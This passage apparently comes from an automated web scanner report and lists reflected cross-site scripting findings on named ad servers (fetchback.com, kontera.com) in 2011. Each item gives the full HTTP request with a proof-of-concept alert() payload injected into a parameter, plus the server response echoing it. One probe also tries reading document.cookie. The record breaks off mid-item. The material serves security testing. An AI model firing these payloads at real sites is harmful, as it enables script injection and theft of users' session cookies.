User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:55:19 GMT
Server: Apache
Last-Modified: Wed, 06 Oct 2010 16:21:19 GMT
ETag: "690fd5-beb-491f52add3dc0"
Accept-Ranges: bytes
Content-Length: 6563
Content-Type: text/html; charset=ISO-8859-1

<!--300x250-->
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<img src="http://img-cdn.mediaplex.com/0/707/52222/GEN09Products1_ebay_1_300x250.gif" width="300" height="250" use
...[SNIP]...
<area shape="rect" coords="198,177,298,249" href="http://adclient.uimserv.net/event.ng/Type=click&FlightID=271125&AdID=690074&TargetID=103547&RawValues=SECTIONID,gmx/homepage/start/de/&Redirect=6d4fd"><script>alert(1)</script>d088635f3c3http://rover.ebay.com/rover/1/707-52222-2108-51/4?mpt=crqigfg%2CbgymsbjuNlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549
...[SNIP]...

4.70. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a145"-alert(1)-"eb438864c80 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=24802&type=widesky&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2526campID%253D9248%2526crID%253D14761%2526pubICode%253D1076556%2526pub%253D340748%2526partnerID%253D91%2526redirectURL%253Dhttp%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F2%2C13%253B3eff4ae48186232a%253B12ed44a1512%2C0%253B%253B%253B3731206972%2Cn3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAAERVK1C4BAAAAAAAAAGEwNzBhMGJjLTUzMTYtMTFlMC05ZTVhLTAwMWIyNDkzNjE4MgBmlSoAAAA%3D%2C%2Chttp%253A%252F%252Ftechie%2Dbuzz%2Ecom%252Ftop%2Dposts%253Futm%5Fsource%253Dmenu%2526utm%5Fmedium%253Dheader%2526utm%5Fcampaign%253Dmenulinks%2C8a145"-alert(1)-"eb438864c80 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?n3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAArGNqmaw88T9xPQrXo3DzP9w1dqr4JgNAmpmZmZmZBUC7dEr2vkcFQAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2J6-UUxzPCQb-EbtleBlFpZSSGcGXbSFL9p0DAAAAAA==,,http%3A%2F%2Ftechie-buzz.com%2Ftop-posts%3Futm_source%3Dmenu%26utm_medium%3Dheader%26utm_campaign%3Dmenulinks,Z%3D160x600%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D1426204%26tgdg%3Dch%26titn%3Dch%26ttch%3Dch%26uatRandNo%3D13324%26_salt%3D3927916856%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252Ftop-posts%253Futm_source%253Dmenu%2526utm_medium%253Dheader%2526utm_campaign%253Dmenulinks%26r%3D1,a070a0bc-5316-11e0-9e5a-001b24936182
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300626397_20056:0; cre=1_1300626452_20056:6436:5:0_20053:6438:10:4_14598:11789:1:1257848; uid=1_1300626452_1297862321306:0415785655118336; kwd=1_1300626452_11317:215266_11717:215266_11718:215266_11719:215266_11722:323901_10827:323901_10842:323905_10839:323905_10824:324105; scg=1_1300626452; ppd=1_1300626452

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:27:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300642067_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 17:27:47 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 17:27:47 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 976

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=24802&type=widesky&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2
...[SNIP]...
jLTUzMTYtMTFlMC05ZTVhLTAwMWIyNDkzNjE4MgBmlSoAAAA%3D%2C%2Chttp%253A%252F%252Ftechie%2Dbuzz%2Ecom%252Ftop%2Dposts%253Futm%5Fsource%253Dmenu%2526utm%5Fmedium%253Dheader%2526utm%5Fcampaign%253Dmenulinks%2C8a145"-alert(1)-"eb438864c80' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.71. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7926c"-alert(1)-"bc07814a48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=24802&type=widesky&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2526campID%253D9248%2526crID%253D14761%2526pubICode%253D1076556%2526pub%253D340748%2526partnerID%253D91%2526redirectURL%253Dhttp%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F2%2C13%253B3eff4ae48186232a%253B12ed44a1512%2C0%253B%253B%253B3731206972%2Cn3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAAERVK1C4BAAAAAAAAAGEwNzBhMGJjLTUzMTYtMTFlMC05ZTVhLTAwMWIyNDkzNjE4MgBmlSoAAAA%3D%2C%2Chttp%253A%252F%252Ftechie%2Dbuzz%2Ecom%252Ftop%2Dposts%253Futm%5Fsource%253Dmenu%2526utm%5Fmedium%253Dheader%2526utm%5Fcampaign%253Dmenulinks%2C&7926c"-alert(1)-"bc07814a48d=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?n3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAArGNqmaw88T9xPQrXo3DzP9w1dqr4JgNAmpmZmZmZBUC7dEr2vkcFQAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2J6-UUxzPCQb-EbtleBlFpZSSGcGXbSFL9p0DAAAAAA==,,http%3A%2F%2Ftechie-buzz.com%2Ftop-posts%3Futm_source%3Dmenu%26utm_medium%3Dheader%26utm_campaign%3Dmenulinks,Z%3D160x600%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D1426204%26tgdg%3Dch%26titn%3Dch%26ttch%3Dch%26uatRandNo%3D13324%26_salt%3D3927916856%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252Ftop-posts%253Futm_source%253Dmenu%2526utm_medium%253Dheader%2526utm_campaign%253Dmenulinks%26r%3D1,a070a0bc-5316-11e0-9e5a-001b24936182
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300626397_20056:0; cre=1_1300626452_20056:6436:5:0_20053:6438:10:4_14598:11789:1:1257848; uid=1_1300626452_1297862321306:0415785655118336; kwd=1_1300626452_11317:215266_11717:215266_11718:215266_11719:215266_11722:323901_10827:323901_10842:323905_10839:323905_10824:324105; scg=1_1300626452; ppd=1_1300626452

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:27:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300642068_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 17:27:48 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 17:27:48 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 979

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=24802&type=widesky&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2
...[SNIP]...
LTUzMTYtMTFlMC05ZTVhLTAwMWIyNDkzNjE4MgBmlSoAAAA%3D%2C%2Chttp%253A%252F%252Ftechie%2Dbuzz%2Ecom%252Ftop%2Dposts%253Futm%5Fsource%253Dmenu%2526utm%5Fmedium%253Dheader%2526utm%5Fcampaign%253Dmenulinks%2C&7926c"-alert(1)-"bc07814a48d=1' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.72. http://imp.fetchback.com/serve/fb/adtag.js [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bac5d"-alert(1)-"7750f188b5b was submitted in the tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=24802bac5d"-alert(1)-"7750f188b5b&type=widesky&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2526campID%253D9248%2526crID%253D14761%2526pubICode%253D1076556%2526pub%253D340748%2526partnerID%253D91%2526redirectURL%253Dhttp%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F2%2C13%253B3eff4ae48186232a%253B12ed44a1512%2C0%253B%253B%253B3731206972%2Cn3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAAERVK1C4BAAAAAAAAAGEwNzBhMGJjLTUzMTYtMTFlMC05ZTVhLTAwMWIyNDkzNjE4MgBmlSoAAAA%3D%2C%2Chttp%253A%252F%252Ftechie%2Dbuzz%2Ecom%252Ftop%2Dposts%253Futm%5Fsource%253Dmenu%2526utm%5Fmedium%253Dheader%2526utm%5Fcampaign%253Dmenulinks%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?n3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAArGNqmaw88T9xPQrXo3DzP9w1dqr4JgNAmpmZmZmZBUC7dEr2vkcFQAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2J6-UUxzPCQb-EbtleBlFpZSSGcGXbSFL9p0DAAAAAA==,,http%3A%2F%2Ftechie-buzz.com%2Ftop-posts%3Futm_source%3Dmenu%26utm_medium%3Dheader%26utm_campaign%3Dmenulinks,Z%3D160x600%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D1426204%26tgdg%3Dch%26titn%3Dch%26ttch%3Dch%26uatRandNo%3D13324%26_salt%3D3927916856%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252Ftop-posts%253Futm_source%253Dmenu%2526utm_medium%253Dheader%2526utm_campaign%253Dmenulinks%26r%3D1,a070a0bc-5316-11e0-9e5a-001b24936182
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300626397_20056:0; cre=1_1300626452_20056:6436:5:0_20053:6438:10:4_14598:11789:1:1257848; uid=1_1300626452_1297862321306:0415785655118336; kwd=1_1300626452_11317:215266_11717:215266_11718:215266_11719:215266_11722:323901_10827:323901_10842:323905_10839:323905_10824:324105; scg=1_1300626452; ppd=1_1300626452

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:27:46 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300642066_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 17:27:46 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 17:27:46 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 976

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=24802bac5d"-alert(1)-"7750f188b5b&type=widesky&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2526campID%253D9248%2526crID%253D14761%2526pubICode%253D1076556%2526pub%253D34074
...[SNIP]...

4.73. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 546e5"-alert(1)-"3426b7f0737 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=24802&type=widesky546e5"-alert(1)-"3426b7f0737&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2526campID%253D9248%2526crID%253D14761%2526pubICode%253D1076556%2526pub%253D340748%2526partnerID%253D91%2526redirectURL%253Dhttp%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F2%2C13%253B3eff4ae48186232a%253B12ed44a1512%2C0%253B%253B%253B3731206972%2Cn3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAAERVK1C4BAAAAAAAAAGEwNzBhMGJjLTUzMTYtMTFlMC05ZTVhLTAwMWIyNDkzNjE4MgBmlSoAAAA%3D%2C%2Chttp%253A%252F%252Ftechie%2Dbuzz%2Ecom%252Ftop%2Dposts%253Futm%5Fsource%253Dmenu%2526utm%5Fmedium%253Dheader%2526utm%5Fcampaign%253Dmenulinks%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?n3caABzDFQBC2jwAAAAAAIhUEAAAAAAAAgAUAAoAAAAAAP8AAAABDS9VIgAAAAAATG0QAAAAAADevBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADC5w0AAAAAAAIAAwAAAAAArGNqmaw88T9xPQrXo3DzP9w1dqr4JgNAmpmZmZmZBUC7dEr2vkcFQAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2J6-UUxzPCQb-EbtleBlFpZSSGcGXbSFL9p0DAAAAAA==,,http%3A%2F%2Ftechie-buzz.com%2Ftop-posts%3Futm_source%3Dmenu%26utm_medium%3Dheader%26utm_campaign%3Dmenulinks,Z%3D160x600%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D1426204%26tgdg%3Dch%26titn%3Dch%26ttch%3Dch%26uatRandNo%3D13324%26_salt%3D3927916856%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252Ftop-posts%253Futm_source%253Dmenu%2526utm_medium%253Dheader%2526utm_campaign%253Dmenulinks%26r%3D1,a070a0bc-5316-11e0-9e5a-001b24936182
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300626397_20056:0; cre=1_1300626452_20056:6436:5:0_20053:6438:10:4_14598:11789:1:1257848; uid=1_1300626452_1297862321306:0415785655118336; kwd=1_1300626452_11317:215266_11717:215266_11718:215266_11719:215266_11722:323901_10827:323901_10842:323905_10839:323905_10824:324105; scg=1_1300626452; ppd=1_1300626452

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:27:46 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300642066_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 17:27:46 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 17:27:46 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 976

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=24802&type=widesky546e5"-alert(1)-"3426b7f0737&clicktrack=http%253A%252F%252Ft.invitemedia.com%252Ftrack_click%253FauctionID%253D13006417481426204-14761%2526campID%253D9248%2526crID%253D14761%2526pubICode%253D1076556%2526pub%253D340748%2526partner
...[SNIP]...

4.74. http://kona40.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7525"%3balert(1)//8c4da4b1adb was submitted in the l parameter. This input was echoed as e7525";alert(1)//8c4da4b1adb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1300642173003&p=13764&k=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1jpNNP3&al=1&l=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1e7525"%3balert(1)//8c4da4b1adb&t=Techie+Buzz+%2C+know+your+technology+head+on&m1=technology+%2C+how+to+%2C+tips+and+tricks+%2C+software+news+%2C+software+reviews+%2C+twitter+%2C+firefox+%2C+tech+news+%2C+t&rId=0&prev_page=http%3A//burp/show/9&rl=0&1=14&mod=536936467&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 15796

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=13764&layout=adlinks&sId=2087,2170,1417&cb=1300642207&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage
...[SNIP]...
uestId="67770071749690528";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1e7525";alert(1)//8c4da4b1adb&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

4.75. http://kona40.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dd26"-alert(1)-"038d1a01eb3 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1300642173003&p=13764&k=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1jpNNP3&al=1&l=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1&t=Techie+Buzz+%2C+know+your+technology+head+on&m1=technology+%2C+how+to+%2C+tips+and+tricks+%2C+software+news+%2C+software+reviews+%2C+twitter+%2C+firefox+%2C+tech+news+%2C+t&rId=03dd26"-alert(1)-"038d1a01eb3&prev_page=http%3A//burp/show/9&rl=0&1=14&mod=536936467&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 23248

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=13764&layout=adlinks&sId=104,980&cb=1300642208&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(10);
r
...[SNIP]...
"Left" } }, { "bridge_text_title" : { "value" : "Verizon 4G LTE" } }, { "advanced_setting_ad_type_id" : { "value" : 10 } } ]});
teDataHere(false,'13764','1');
konaTweakMode=545325331;
konaRequestId="03dd26"-alert(1)-"038d1a01eb3";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1&dc_aff_id=");
onKonaRetu
...[SNIP]...

4.76. http://kona5.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed95a"%3balert(1)//a0710f25a4a was submitted in the l parameter. This input was echoed as ed95a";alert(1)//a0710f25a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

